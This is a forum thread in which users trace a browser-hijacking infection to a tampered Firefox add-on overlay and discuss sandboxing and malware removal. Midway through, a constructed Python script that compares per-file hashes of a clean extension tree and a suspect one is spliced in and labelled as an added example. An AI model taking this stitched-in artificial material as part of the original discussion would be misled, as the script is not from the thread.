RESOLVED Strange script tries to run when connection is down

computerfreaker
Senior Member
Posts: 220
Joined: Wed Sep 16, 2009 10:03 pm
Location: USA

Re: Strange script tries to run when connection is down

Post by computerfreaker »

Montagar wrote:Okay, I'll admit that I am stupid for not knowing that Windows XP will not search for content inside of a .xul file, I am sure there are plenty of other extensions that are excluded as well.

If I had known that, I would have looked for a program that would search the content of ALL files. Sorry about that guys. This would have been found a long time ago.

The overlay.xul file contains all of the information that we were looking for... google.com, yahoo.com, ask.com, etc.

Man, do I feel dumb. :(
D'oh, am I ever an idiot.
I was searching through some VB projects a few days ago, and Windows Search completely ignored all the .vbp, .frm, .bas, etc. files - I should have known it would ignore .xul's as well... :oops:

Well, I guess this is a lesson for the future... and Tom, you might want to search your own computer sooner rather than later. ;)

@Montagar, could you upload those files & post the link here? I'm very interested in analyzing this... (and maybe we can track it back to its source, although I doubt the malware creators would be that stupid)
With great power comes great responsibility.
Learn something new every day, and the rest will take care of itself.
Life is a journey, not a destination. Enjoy the trip!
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

Post by Tom T. »

Montagar wrote:Man, do I feel dumb. :(
*Don't.*

It took most of the Support Team, the Admin, and a determined, knowledgeable, and highly-motivated user, about three weeks to track down and eliminate the bazillion possibilities before locating this. (And now we're *all* smarter, in case such an issue should arise again.)

Clearly, I had a one-time infection that was destroyed as soon as the sandbox was emptied -- which is *exactly* why I consider SB vital, not just for general safety, but for doing support here, where we're asked to go to strange sites, disable NS, etc. That disappearance was another confusing factor, and prevented me from investigating it *directly*. Didn't know where it came from, so couldn't try to "get infected" again. Your post of the contents should help track down the source.

Disclaimer: There are many virtualization and sandboxing solutions available. I mention Sandboxie because it's the one I use and am most familiar with. Sandboxie is not endorsed nor supported by this forum, NoScript, FlashGot, Giorgio Maone, Informaction, or any other person or entity here. Support is the responsibility of the developer of that tool. Investigate available solutions before deciding on your own, rather than relying on my (or anyone else's) personal experience or opinion.

Having said that, I feel that *some* type of sandboxing or virtualization tool is a vital addition to overall "defense in depth". (as this case so dramatically proved. :) )

@ computerfreaker: Would you like a job here? Rewards: Long hours, no pay, occasional flames from disgruntled users .... :lol:

Seriously: Well done. :D

Let's all thank computerfreaker for his unending persistence in the face of multiple blind alleys and dead ends.

Edit: Oops, missed that one line,
CF: "Tom, you might want to search your own computer sooner rather than later."
I'd already done all of the searches, including the one that was eventually successful for Montagar, and I'm about 100% certain that Sandboxie dumped the badware. (another reason I empty it *very* frequently -- often, between each site visit). Inability to reproduce confirms this.

I do wish that I'd documented each open/close of the browser, machine reboot, etc., but I foolishly assumed that if I could reproduce it today, I could reproduce it tomorrow. I *will* take the "Sandboxie effect" into consideration in the future -- thanks for indirectly bringing up that point.

Or *everyone* could get some kind of virtualization tool (should be standard with all OS and browsers :D ), and a lot of these attacks would become non-issues. ;)

But *why* did only two users in the entire NS community notice this???? .... still like to find the source, if possible.
computerfreaker
Senior Member
Posts: 220
Joined: Wed Sep 16, 2009 10:03 pm
Location: USA

Re: Strange script tries to run when connection is down

Post by computerfreaker »

Tom T. wrote:
Montagar wrote:Man, do I feel dumb. :(
*Don't.*

It took most of the Support Team, the Admin, and a determined, knowledgeable, and highly-motivated user, about three weeks to track down and eliminate the bazillion possibilities before locating this. (And now we're *all* smarter, in case such an issue should arise again.)
yes, this one gave us all a run for our money... definitely something to file in memory for possible future use, in case such a thing ever happens again. (Hope it doesn't, but the best offense is a good defense, so...)
Tom T. wrote:Clearly, I had a one-time infection that was destroyed as soon as the sandbox was emptied -- which is *exactly* why I consider SB vital, not just for general safety, but for doing support here, where we're asked to go to strange sites, disable NS, etc. That disappearance was another confusing factor, and prevented me from investigating it *directly*. Didn't know where it came from, so couldn't try to "get infected" again. Your post of the contents should help track down the source.
yes, Monty (you don't mind if I call you that, do you? :mrgreen:), your post of the contents will be a pretty important thing to have. I have to confess, I'm eager to see the beast that's been tormenting us for three weeks or so...
Tom T. wrote:Disclaimer: There are many virtualization and sandboxing solutions available. I mention Sandboxie because it's the one I use and am most familiar with. Sandboxie is not endorsed nor supported by this forum, NoScript, FlashGot, Giorgio Maone, Informaction, or any other person or entity here. Support is the responsibility of the developer of that tool. Investigate available solutions before deciding on your own, rather than relying on my (or anyone else's) personal experience or opinion.
I also use Sandboxie on occasion; looks like I'd better start using it more.
Disclaimer: I'm not endorsing anything either. :)
Tom T. wrote:Having said that, I feel that *some* type of sandboxing or virtualization tool is a vital addition to overall "defense in depth". (as this case so dramatically proved. :) )
yes, an extra line of defense like that is huge. I'd say it saved your machine from that innoshot thing, and it would have saved Montagar as well. Fortunately, NS & his vigilance kept it down until we could take it out. :geek:
Tom T. wrote:@ computerfreaker: Would you like a job here? Rewards: Long hours, no pay, occasional flames from disgruntled users .... :lol:
It would be a great honor. :mrgreen:
Tom T. wrote:Seriously: Well done. :D

Let's all thank computerfreaker for his unending persistence in the face of multiple blind alleys and dead ends.
Thank you so much, Tom! I'd also like to thank both you and Montagar for your persistence in trying just about every wacky idea we came up with, and especially Montagar for not hosing his drive, even when things looked really bad... :mrgreen:
(Side note: hey, it really is darkest just before the dawn! :D)
Tom T. wrote:Edit: Oops, missed that one line,
CF: "Tom, you might want to search your own computer sooner rather than later."
I'd already done all of the searches, including the one that was eventually successful for Montagar, and I'm about 100% certain that Sandboxie dumped the badware. (another reason I empty it *very* frequently -- often, between each site visit). Inability to reproduce confirms this.
Good. I wasn't sure, since the malware was an addon, if your enabling/disabling temporarily took out the addon or if closing the sandbox took care of it for good. Good riddance...
Now I have to wonder how the thing managed to survive one browser restart - addons can't be installed w/o a browser restart, and the sandbox took care of it so... I'd love to know just what went on inside your computer that the malware survived one restart but not two. (Although maybe you just restarted your browser, not the entire sandbox? That's possible...)
Tom T. wrote:I do wish that I'd documented each open/close of the browser, machine reboot, etc., but I foolishly assumed that if I could reproduce it today, I could reproduce it tomorrow. I *will* take the "Sandboxie effect" into consideration in the future -- thanks for indirectly bringing up that point.
Well, IMHO something like VMWare or VirtualBox could be useful in cases like this - by locking down the VM, infection would be kept inside it but could be readily examined. (With no fear of the infection vanishing the next day unless you deleted the VM)
Tom T. wrote:Or *everyone* could get some kind of virtualization tool (should be standard with all OS and browsers :D ), and a lot of these attacks would become non-issues. ;)
True. Although it's probably just as well that Montagar didn't have a sandbox in place, as this circus could save other users with similar issues (and no sandbox)...
Tom T. wrote:But *why* did only two users in the entire NS community notice this???? .... still like to find the source, if possible.
No idea. Given the fact that it came via an addon, and neither of you noticed the "do you want to install this addon" dialog, I'd guess it piggybacked on a legit addon or install.

Don't want to sound nosy or anything, but could the two of you post your Fx addon list (including version #'s) and your application list? A simple comparison should eliminate most of the possibilities... and, given that both infections came recently (I can tell about Monty's from the file dates, and yours from the sandbox), it shouldn't be hard to track down. (The malware source code should really help, too)

Cheers!!
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

Post by Tom T. »

computerfreaker wrote:I also use Sandboxie on occasion; looks like I'd better start using it more.
How 'bout "100% of the time"? Only exceptions: Firefox updates from Mozilla. (Need an admin-privileged browser.)

Only downsides: If you d/l a video, pic, sound clip, etc., there's an extra step or two to move it from the sandbox to your "real" machine. If you forget, you *could* lose it, but well-behaved SB looks for the types of files that you might want to save, and prompts you to recover them (or not), before it will close and empty.

The manual move of mysong.mp3 from sandbox to HD is easy. When I click "Save as... " etc., I get an immediate prompt from SB, "Would you like to recover the following file?" "Yes, to same folder" .. "Yes, to a different folder" "Not right now".

Tip: I have my mouse pointer configured so that the pointer automatically jumps to any highlighted dialogue button. So one left-click, and it's *done*. I don't know if all mouse drivers support this. (This is a laptop, where the touchpad isn't as fast to use as a physical mouse is.)

You can get some xpi updates in this fashion (manual move, then later drop into an Admin browser).
Tom T. wrote:@ computerfreaker: Would you like a job here? Rewards: Long hours, no pay, occasional flames from disgruntled users .... :lol:
It would be a great honor. :mrgreen:
Consider the statement a great honor. :) But it's not my place to choose Mods. (also will PM you with some additional considerations.) Slightly facetious, but indeed a compliment to your tireless detective work.
Tom T. wrote:Edit: Oops, missed that one line,
CF: "Tom, you might want to search your own computer sooner rather than later."
I'd already done all of the searches, including the one that was eventually successful for Montagar, and I'm about 100% certain that Sandboxie dumped the badware. (another reason I empty it *very* frequently -- often, between each site visit). Inability to reproduce confirms this.
Good. I wasn't sure, since the malware was an addon, if your enabling/disabling temporarily took out the addon or if closing the sandbox took care of it for good. Good riddance...
Now I have to wonder how the thing managed to survive one browser restart - addons can't be installed w/o a browser restart, and the sandbox took care of it so... I'd love to know just what went on inside your computer that the malware survived one restart but not two. (Although maybe you just restarted your browser, not the entire sandbox? That's possible...)
The last statement isn't possible. I have SB configured to the safest setting, which is to automatically empty the sandbox whenever the sandboxed app (the browser, in this case) is closed.

So there are two possibilities: 1) A legitimate, but infected update was obtained with a non-SB'd browser, and restarted as required, in which case the malcode *is* part of the update that is written to the HD. Then, SB would clone the infected extension every time. BUT that would *not* have extinguished the malcode, as we apparently saw SB do. I would still be able to reproduce it as ol' Monty did. So let's rule that out.

2) What I had said earlier: That I picked up the infection in the same browsing session, perhaps as part of some rogue code running on Google (I have all of the ads and ad scripts blocked), and never did close the session on that "interesting" day. Perhaps when I did the test of disabling the extensions, which *does* require restarting an admin-priv browser, it wasn't the disabling that eliminated it, it was the closing of SB to do the disable/restart that dumped the just-acquired malcode.

The more I think about it, the more #2 seems to be the only possibility.

In the future, when I can reproduce an error that may be infection-related, I'll examine the contents of the sandbox *while it is still open*, and log the closing/reopening in relation to the issue. In my sole defense :oops: , most of the malfunction issues are either a bug in NS, a flaw in site coding, configuration errors, etc. IIRC, this is the first apparently-infectious agent that I can remember dealing with in my time here.
Well, IMHO something like VMWare or VirtualBox could be useful in cases like this - by locking down the VM, infection would be kept inside it but could be readily examined. (With no fear of the infection vanishing the next day unless you deleted the VM)
Definitely. Or I could have inspected the contents in real time, as mentioned. Or copied them to a permanent folder on my machine, and *opened its files sandboxed only*, at leisure, to examine the contents. Yes, you can open just about any app or file inside SB. (Uh-oh, sounds like I'm touting it again. Just thinking of ways I could have used it to examine this sucker even after it was extinguished from the virtual browser.)

VMWare is much more expensive than SB (which is available for free if you can stand the nag screens), and requires more disk space, memory, etc. Definitely a good thing for the tech-savvy, developers, etc. SB (and some others) are light in weight and require only a very short learning curve, after which there aren't any decisions to make -- probably more friendly for the average home user. I know that devs like Guardian and Giorgio Maone use the more sophisticated ones so that they can easily have multiple OSs on one machine, test sw, patches, etc.
Tom T. wrote:Or *everyone* could get some kind of virtualization tool (should be standard with all OS and browsers :D ), and a lot of these attacks would become non-issues. ;)
True. Although it's probably just as well that Montagar didn't have a sandbox in place, as this circus could save other users with similar issues (and no sandbox)...
And no NoScript -- I wonder how many users of other browsers, or of Fx without NS, got this infection, and *what actual damage it did*? ... And why has it not made a splash in the security community? Seems like it didn't penetrate very far...
Don't want to sound nosy or anything, but could the two of you post your Fx addon list (including version #'s) and your application list? A simple comparison should eliminate most of the possibilities... and, given that both infections came recently (I can tell about Monty's from the file dates, and yours from the sandbox), it shouldn't be hard to track down. (The malware source code should really help, too)
Being naturally lazy :mrgreen: , how 'bout if we look at the source code first, which *might* be a dead give-away. If not, then we can take other steps. 8-)
Montagar
Junior Member
Posts: 43
Joined: Tue Oct 27, 2009 11:44 pm

Re: Strange script tries to run when connection is down

Post by Montagar »

Okay... what method should I use to post the overlay.xul code? (Post it here using the code tags, use pastebin.com, etc)
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

Post by Tom T. »

Montagar wrote:Okay... what method should I use to post the overlay.xul code? (Post it here using the code tags, use pastebin.com, etc)
How large is it? The XUL files I have are only a dozen lines or so, so posting here using code tags would be easiest for all concerned.

But if this malicious file is very large (runs into a two-page post, lol), exterior hosting with a link is better. If you'd rather not use an outside host, I have plenty of free space available on my own site. You could email me the file, first changing the extension to .txt to avoid tripping filters. But it's probably not much larger than the legit ones.
Firefoxer

Re: Strange script tries to run when connection is down

Post by Firefoxer »

Hello Montagar, did you know that HijackThis is now mostly considered a deprecated malware removal tool among the malware removal community?
The source of this variant of goored (it's been around since early last year) may still be on your hdd, despite the goored behaviour having been stopped for you just now.
In the Firefox forums, in a thread dealing with one of these vundo aka goored aka clickfeedmanager etc. variants, Daifne, a moderator, wrote:
Install and run these programs.
Malwarebytes' Anti-Malware
SuperAntispyware
AdAware
Spybot Search & Destroy

If these don't find it or can't clear it, post in one of these forums for specialized malware removal help:
http://www.spywarewarrior.com/index.php
http://forum.aumha.org/
http://www.spywareinfoforum.com/
and that's the best course of action for geeks and non-geeks alike when these kinds of infections arise.
Malwarebytes' Anti-Malware (MBAM) is at the bleeding edge for finding malware right now, so it's the tool most likely to find evidence of the newest kinds of vundos.
I also wonder whether you are keeping right up-to-date with your Java (use the Control Panel) versions, and at the same time removing all old versions if you don't have specific apps that use them.

With any luck, you are already free of any underlying malware, but I want to add that you please consider taking your findings to the forums which specialise in malware hunting anyway. This is because if your finding is a new variant, then your data won't be dangling around in a little-known forum (to the malware searcher's community, not to us in the Firefox community, of course :-)), it can be used to update the current very effective goored removal tool that will help the non-tech needy, and if your variant is already known, then you *may*, judging by the reported steps you've taken, still need help to be perfectly certain that you've found the original vundo infection source.
Good luck :-)
GµårÐïåñ
Lieutenant Colonel
Posts: 3369
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: Strange script tries to run when connection is down

Post by GµårÐïåñ »

Tom T. wrote:@ Guardian: Is it possible that a "legitimate" extension was corrupted to contain the rogue script? Should we check checksums on those extension folders? (Since I can't reproduce it, I doubt I'd find anything.)
Absolutely, that's why I said exploiting an extension's vulnerability, not unlike the ABP issue that was recently brought to light, around the same time the developer basically said "I don't have time" :roll: Basically someone could have analyzed the code of an extension and found a way to inject into it or use it to run their own code, absolutely. HOWEVER, that being said, it will masquerade and install as "SOMETHING"; what that is depends, but it WILL be visible in the addons, and if you know you didn't put it there, you remove it. Unfortunately it pains me to bring it up, but as recently as the ABP/NS issue, you remember it was system level injection that became the problem, so yes it can be done, but again it will still show up.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Montagar
Junior Member
Posts: 43
Joined: Tue Oct 27, 2009 11:44 pm

Re: Strange script tries to run when connection is down

Post by Montagar »

Well before I post the source code there are a few things that I need to get cleared up first.

I have looked at the code and done some research and it appears that this code belongs to a valid FF add-on (it's listed at addons.mozilla.org).

I know for a fact that I have never installed this particular add-on (well at least not knowingly), and it was never listed in my extensions or plugins list.

So before I post the code, I am going to do some research like comparing the "valid" add-on with the "rogue" add-on.

I hope you all understand that I don't want to open the door for accusations and such without doing some prudent research first.
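Montagar's plan above, comparing the "valid" add-on with the "rogue" copy, and Tom T.'s earlier question about checking checksums on the extension folders, come down to the same procedure: hash every file in both trees and list what was added, removed or changed. The block below is an added example written for this thread, not code from any poster or from the add-on in question. Both trees in it are constructed stand-ins (a placeholder install.rdf, chrome.manifest and overlay.xul, not the real add-on or the real rogue copy); the "suspect" tree differs from the "reference" tree only in an edited overlay.xul and one extra script file, which is exactly the kind of difference a name-only or size-only comparison can miss.

```python
"""Per-file hash comparison of a reference extension against a suspect copy.

Added example for this thread, not code from the original posts.  Both
trees below are constructed stand-ins (placeholder extension files, not
the real add-on or the real rogue copy).  The method is what matters:
hash every file in each tree and report what was added, removed or
modified, so a tampered overlay.xul or an extra script stands out even
when the manifest and most other files are byte-for-byte identical.
"""
import hashlib
import os
import tempfile

# Constructed "clean" tree, standing in for the add-on as obtained from
# addons.mozilla.org.
REFERENCE_FILES = {
    "install.rdf": "<RDF><!-- constructed install manifest --></RDF>\n",
    "chrome.manifest":
        "content example chrome/content/\n"
        "overlay chrome://browser/content/browser.xul "
        "chrome://example/content/overlay.xul\n",
    "chrome/content/overlay.xul":
        '<?xml version="1.0"?>\n'
        '<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">\n'
        '  <script src="chrome://example/content/example.js"/>\n'
        "</overlay>\n",
    "chrome/content/example.js": "// constructed: the add-on's own code\n",
}

# Constructed "suspect" tree: same files, except overlay.xul pulls in one
# extra script and that script exists as a new file.
SUSPECT_FILES = dict(REFERENCE_FILES)
SUSPECT_FILES["chrome/content/overlay.xul"] = (
    REFERENCE_FILES["chrome/content/overlay.xul"].replace(
        "</overlay>",
        '  <script src="chrome://example/content/redirect.js"/>\n</overlay>')
)
SUSPECT_FILES["chrome/content/redirect.js"] = (
    "// constructed stand-in for injected code\n"
    'var hosts = ["google.com", "yahoo.com", "ask.com"];\n'
)


def write_tree(files):
    """Write a {relative_path: text} mapping into a fresh temp dir."""
    root = tempfile.mkdtemp(prefix="ext_")
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def hash_tree(root):
    """Return {relative_path: sha256 hex digest} for every file under root."""
    digests = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            digests[rel] = h.hexdigest()
    return digests


def diff_trees(reference_root, suspect_root):
    """Classify every path in either tree as added, removed, modified or
    unchanged, comparing content hashes rather than names or sizes."""
    ref = hash_tree(reference_root)
    sus = hash_tree(suspect_root)
    return {
        "added": sorted(p for p in sus if p not in ref),
        "removed": sorted(p for p in ref if p not in sus),
        "modified": sorted(p for p in ref if p in sus and ref[p] != sus[p]),
        "unchanged": sorted(p for p in ref if p in sus and ref[p] == sus[p]),
    }


def build_sample_trees():
    """Materialise the two constructed trees; return (reference, suspect)."""
    return write_tree(REFERENCE_FILES), write_tree(SUSPECT_FILES)


if __name__ == "__main__":
    reference, suspect = build_sample_trees()
    for kind, paths in diff_trees(reference, suspect).items():
        print(f"{kind}: {paths}")
```

To use it on real data, unpack the .xpi downloaded from addons.mozilla.org into one directory (an .xpi is a zip archive) and point `diff_trees` at that directory and at the copy found in the profile's extensions folder; anything in "added" or "modified" is what to read first.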
computerfreaker
Senior Member
Posts: 220
Joined: Wed Sep 16, 2009 10:03 pm
Location: USA

Re: Strange script tries to run when connection is down

Post by computerfreaker »

Tom T. wrote:
computerfreaker wrote:I also use Sandboxie on occasion; looks like I'd better start using it more.
How 'bout "100% of the time"? Only exceptions: Firefox updates from Mozilla. (Need an admin-privileged browser.)
100% sounds good to me - since I use Fx Portable, I don't want automatic updates (they break any Fx local installs, last I heard). 100% is good... :)
Tom T. wrote:Only downsides: If you d/l a video, pic, sound clip, etc., there's an extra step or two to move it from the sandbox to your "real" machine. If you forget, you *could* lose it, but well-behaved SB looks for the types of files that you might want to save, and prompts you to recover them (or not), before it will close and empty.
Cool. With d/l'ing, I'd have to be careful, though, as my dialup connection isn't the sort of thing to make that kind of mistake with... especially with a big, 101-MB OOo install, eh? ;)
Tom T. wrote:The manual move of mysong.mp3 from sandbox to HD is easy. When I click "Save as... " etc., I get an immediate prompt from SB, "Would you like to recover the following file?" "Yes, to same folder" .. "Yes, to a different folder" "Not right now".
Sounds easy... and my own (admittedly limited) experience with SandBoxie confirms the ease-of-use.
Tom T. wrote:Tip: I have my mouse pointer configured so that the pointer automatically jumps to any highlighted dialogue button. So one left-click, and it's *done*. I don't know if all mouse drivers support this. (This is a laptop, where the touchpad isn't as fast to use as a physical mouse is.)
My touchpad supports that, but I won't be doing it anytime soon - I tend to click pretty quickly, and any auto-moving could result in my clicking something I don't want to. I've already turned that off...
Tom T. wrote:You can get some xpi updates in this fashion (manual move, then later drop into an Admin browser).
Oh, that's right, I'd have to run addon updates in a non-sandboxed browser... oh well, not a big deal. :)
Tom T. wrote:
Tom T. wrote:@ computerfreaker: Would you like a job here? Rewards: Long hours, no pay, occasional flames from disgruntled users .... :lol:
It would be a great honor. :mrgreen:
Consider the statement a great honor. :) But it's not my place to choose Mods. (also will PM you with some additional considerations.) Slightly facetious, but indeed a compliment to your tireless detective work.
Your statement is a very great honor to me; this is definitely one for Scrapbook to save. :)
I understand you can't choose mods, and your additional considerations are very valid as well; however, just the statement is a huge reward. I value everything you guys have to say, and (especially from a mod) that statement means a great deal to me... :mrgreen:
Tom T. wrote:
Tom T. wrote:Edit: Oops, missed that one line,
CF: "Tom, you might want to search your own computer sooner rather than later."
I'd already done all of the searches, including the one that was eventually successful for Montagar, and I'm about 100% certain that Sandboxie dumped the badware. (another reason I empty it *very* frequently -- often, between each site visit). Inability to reproduce confirms this.
Good. I wasn't sure, since the malware was an addon, if your enabling/disabling temporarily took out the addon or if closing the sandbox took care of it for good. Good riddance...
Now I have to wonder how the thing managed to survive one browser restart - addons can't be installed w/o a browser restart, and the sandbox took care of it so... I'd love to know just what went on inside your computer that the malware survived one restart but not two. (Although maybe you just restarted your browser, not the entire sandbox? That's possible...)
The last statement isn't possible. I have SB configured to the safest setting, which is to automatically empty the sandbox whenever the sandboxed app (the browser, in this case) is closed.

So there are two possibilities: 1) A legitimate, but infected update was obtained with a non-SB'd browser, and restarted as required, in which case the malcode *is* part of the update that is written to the HD. Then, SB would clone the infected extension every time. BUT that would *not* have extinguished the malcode, as we apparently saw SB do. I would still be able to reproduce it as ol' Monty did. So let's rule that out.

2) What I had said earlier: That I picked up the infection in the same browsing session, perhaps as part of some rogue code running on Google (I have all of the ads and ad scripts blocked), and never did close the session on that "interesting" day. Perhaps when I did the test of disabling the extensions, which *does* require restarting an admin-priv browser, it wasn't the disabling that eliminated it, it was the closing of SB to do the disable/restart that dumped the just-acquired malcode.

The more I think about it, the more #2 seems to be the only possibility.
#2 has one problem though - you'd have to restart the browser to install the addon! So how this thing survived on browser/sandbox restart (to install), but not a second restart, is a mystery that probably only the source code can clear up.
Tom T. wrote:
Well, IMHO something like VMWare or VirtualBox could be useful in cases like this - by locking down the VM, infection would be kept inside it but could be readily examined. (With no fear of the infection vanishing the next day unless you deleted the VM)
Definitely. Or I could have inspected the contents in real time, as mentioned. Or copied them to a permanent folder on my machine, and *opened its files sandboxed only*, at leisure, to examine the contents. Yes, you can open just about any app or file inside SB. (Uh-oh, sounds like I'm touting it again. Just thinking of ways I could have used it to examine this sucker even after it was extinguished from the virtual browser.)
If Montagar ever posts the source (see his comment below), I'll be opening it in a sandbox only - I don't feel like turning it loose on my system, thanks anyway. :D
Tom T. wrote:VMWare is much more expensive than SB (which is available for free if you can stand the nag screens), and requires more disk space, memory, etc. Definitely a good thing for the tech-savvy, developers, etc. SB (and some others) are light in weight and require only a very short learning curve, after which there aren't any decisions to make -- probably more friendly for the average home user. I know that devs like Guardian and Giorgio Maone use the more sophisticated ones so that they can easily have multiple OSs on one machine, test sw, patches, etc.
I was thinking more of VMWare Server or VMWare Player, both of which are free... (I know, because I've used both before)
VirtualBox is also free, but a little less advanced AFAICT. (I've used VirtualBox as well, but ditched it in favor of VMWare)
Tom T. wrote:
Tom T. wrote:Or *everyone* could get some kind of virtualization tool (should be standard with all OS and browsers :D ), and a lot of these attacks would become non-issues. ;)
True. Although it's probably just as well that Montagar didn't have a sandbox in place, as this circus could save other users with similar issues (and no sandbox)...
And no NoScript -- I wonder how many users of other browsers, or of Fx without NS, got this infection, and *what actual damage it did*? ... And why has it not made a splash in the security community? Seems like it didn't penetrate very far...
Definitely weird that we haven't heard more about this. Given the number of NS users, you'd think somebody would notice...
Tom T. wrote:
Don't want to sound nosy or anything, but could the two of you post your Fx addon list (including version #'s) and your application list? A simple comparison should eliminate most of the possibilities... and, given that both infections came recently (I can tell about Monty's from the file dates, and yours from the sandbox), it shouldn't be hard to track down. (The malware source code should really help, too)
Being naturally lazy :mrgreen: , how 'bout if we look at the source code first, which *might* be a dead give-away. If not, then we can take other steps. 8-)
Sure, let's see the source first. :)
Only thing is, if this is well-designed it won't leave any calling cards at all...
Firefoxer wrote:Hello Montagar, HijackThis is a deprecated malware removal tool mostly among the malware removal community now, did you know?
Deprecated? HJT? Wow.
It's still a pretty potent tool, AFAICT... and, like most deprecated things, I doubt it's going anywhere soon. That's just MHO, though.
Firefoxer wrote:The source of this variant of goored (it's been around since early last year) may still be on your hdd, despite the goored behaviour having been stopped for you just now.
In the Firefox forums, in a thread dealing with one of these vundo aka goored aka clickfeedmanager etc. variants, Daifne, a moderator, wrote:
Install and run these programs.
Malwarebytes' Anti-Malware
SuperAntispyware
AdAware
Spybot Search & Destroy

If these don't find it or can't clear it, post in one of these forums for specialized malware removal help:
http://www.spywarewarrior.com/index.php
http://forum.aumha.org/
http://www.spywareinfoforum.com/
and that's the best course of action for geeks and non-geeks alike when these kinds of infections arise.
True, but we weren't totally sure this was an infection - and even now, we're not sure, pending evidence from Montagar.
Firefoxer wrote:Malwarebytes' Anti-Malware (MBAM) is at the bleeding edge for finding malware right now, so it's the tool most likely to find evidence of the newest kinds of vundos.
True. But I thought you ran MBAM, Monty? Or am I thinking of something else?
Firefoxer wrote:With any luck, you are already free of any underlying malware, but I want to add that you please consider taking your findings to the forums which specialise in malware hunting anyway. This is because if your finding is a new variant, then your data won't be dangling around in a little-known forum (to the malware searcher's community, not to us in the Firefox community, of course :-)), it can be used to update the current very effective goored removal tool that will help the non-tech needy, and if your variant is already known, then you *may*, judging by the reported steps you've taken, still need help to be perfectly certain that you've found the original vundo infection source.
Sound advice, IMHO.
Montagar wrote:Okay... what method should I use to post the overlay.xul code? (Post it here using the code tags, use pastebin.com, etc)
If you decide to post it, any public upload site should be OK... just make sure you label it in such a fashion that nobody doubts it's malware (e.g. "Innoshots malware.zip" would be great), so nobody stumbles into it and gets infected by mistake. Also, make sure you change the link protocol so nobody accidentally clicks it, pre-loads it (addons like Fasterfox preload links, IIRC), etc...
GµårÐïåñ wrote:Basically someone could have analyzed a code for an extension and found a way to inject into or use it to run their own code, absolutely. HOWEVER, that being said, it will masquerade and install as "SOMETHING", what that is depends but it WILL be visible in the addons and you know you didn't put it there, you remove it.
So are you saying nothing can hide from the addons list, just piggyback on a legitimate addon? Because it sounds like these goored infections are all hiding from the addons list, but it also sounds like you're saying nothing can hide from the list... I'd like to resolve that discrepancy, primarily just for the knowledge.
Montagar wrote:Well before I post the source code there are a few things that I need to get cleared up first.

I have looked at the code and done some research and it appears that this code belongs to a valid FF add-on (it's listed at addons.mozilla.org).

I know for a fact that I have never installed this particular add-on (well at least not knowingly), and it was never listed in my extensions or plugins list.

So before I post the code, I am going to do some research like comparing the "valid" add-on with the "rogue" add-on.

I hope you all understand that I don't want to open the door for accusations and such without doing some prudent research first.
Well, I'll be danged. I'd love to know just what's going on here... has a valid addon been hacked, a malicious addon put out as a valid addon, or what the heck?
Monty, would you be willing to PM the details of this? I'd be happy to see the details, and I'm sure Tom, Guardian, Alan and possibly even Mr. Maone might want to see as well... (listing people who've been active in the thread, although you might want to be sure they're OK with you PM'ing the details)
As always, everything you send will be in strict confidence...

-computerfreaker
Post by computerfreaker »

The "fun" never stops, does it?
You guys had better check this out: http://forums.mozillazine.org/viewtopic ... b&start=30

Here's the relevant post:
There are DLLs that are installed by some add-on to Firefox. You will be reinfected when you reboot unless you get rid of them. Do goorfix.exe first to stop the behavior. Look in your msconfig list of startup items and you will see two that are randomly named (long names, lots of characters). Get rid of those two or it will come back.
People are also reporting having the same issue in IE... apparently this goored infection has been around for a LONG time (January '09), and you guys just got a new variant.

btw, make sure your .NET Framework addon is disabled/uninstalled and the Windows Presentation Foundation plugin is disabled - those provide a nice attack vector goored's been using to spread. This is a classic drive-by download... thanks, MS. :mad:
Post by Tom T. »

Tom T. wrote:...You can get some xpi updates in this fashion (manual move, then later drop into an Admin browser).
CF wrote:Oh, that's right, I'd have to run addon updates in a non-sandboxed browser... oh well, not a big deal. :)
Sorry if I wasn't clear again. What I was trying to say is that you can get the .xpi with your sandboxed browser, recover the xpi from the sandbox, then drop it in a non-SB browser *with the Internet connection off*. If the xpi itself is corrupted, you're still hosed. But it just minimizes the number of times that you have to expose a non-SB browser to the world, that's all. (Then re-start the non-SB, close it, turn the Net back on, and start your SB browser.) I wasn't saying that it would prevent a corrupt add-on from affecting you. Just that there are very few occasions that you *must* run non-SB live on the Net.
#2 has one problem though - you'd have to restart the browser to install the addon! So how this thing survived on browser/sandbox restart (to install), but not a second restart, is a mystery that probably only the source code can clear up.
See above. You must restart a *non-SB* browser, so that the new files can be written to the profile on the HD. The malcode gets written as well. *But* ... then it wouldn't have been extinguished by SB, which is why I said,
That I picked up the infection in the same browsing session, perhaps as part of some rogue code running on Google
This is why I asked Guardian if a legit extension could be corrupted, and as you see, he said someone could find a way to inject their code into a legit extension (not an update, IIUC). The only thing puzzling me here is his statement that it would be visible in the add-ons, which neither Monty nor I saw, so I'm awaiting the same response Monty is to that question. Myself, I don't see why it couldn't just run from within the corrupted extension that arouses no suspicion in your add-ons list.

@ Guardian: Can you elaborate on that, please?
If Montagar ever posts the source (see his comment below), I'll be opening it in a sandbox only - I don't feel like turning it loose on my system, thanks anyway.
We don't need to open it. The XUL files can be posted here in text with code tags. E.g:

<?xml version="1.0"?>

<!DOCTYPE overlay SYSTEM "chrome://javaconsole1.x.x_x/locale/ffjcext.dtd">
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript" src="chrome://javaconsole1.x.x_x/content/ffjcext.js"/>

<menupopup id="menu_ToolsPopup">
  <menuitem
    id="javaconsole1.x.x.x"
    label="&javaConsoleCmd.label;"
    accesskey="&javaConsoleCmd.accesskey;"
